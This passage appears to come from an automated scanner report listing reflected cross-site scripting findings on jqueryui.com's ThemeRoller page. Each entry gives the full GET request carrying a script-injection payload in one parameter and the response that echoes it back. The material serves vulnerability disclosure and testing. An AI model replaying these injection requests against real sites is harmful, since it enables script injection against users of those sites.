The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 988bb"><script>alert(1)</script>8a2c7460782 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

1.102. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9db"><script>alert(1)</script>ef4213fbf23 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

1.103. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c10"><script>alert(1)</script>093068ed04f was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

1.104. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2f4"><script>alert(1)</script>a6a969de1a8 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

1.105. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30360"><script>alert(1)</script>3dda5c6d39d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

1.106. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9152e"><script>alert(1)</script>516645a1257 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.107. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31e6"><script>alert(1)</script>bee3a69fc06 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

1.108. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fca1"><script>alert(1)</script>544cc932a96 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

1.109. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f31c"><script>alert(1)</script>a87b30d1a5d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

1.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deade"><script>alert(1)</script>1bd88013d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?deade"><script>alert(1)</script>1bd88013d0d=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:34:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&deade"><script>alert(1)</script>1bd88013d0d=1" type="text/css" media="all" />
...[SNIP]...

1.111. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6323d"><script>alert(1)</script>e503afc2b was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

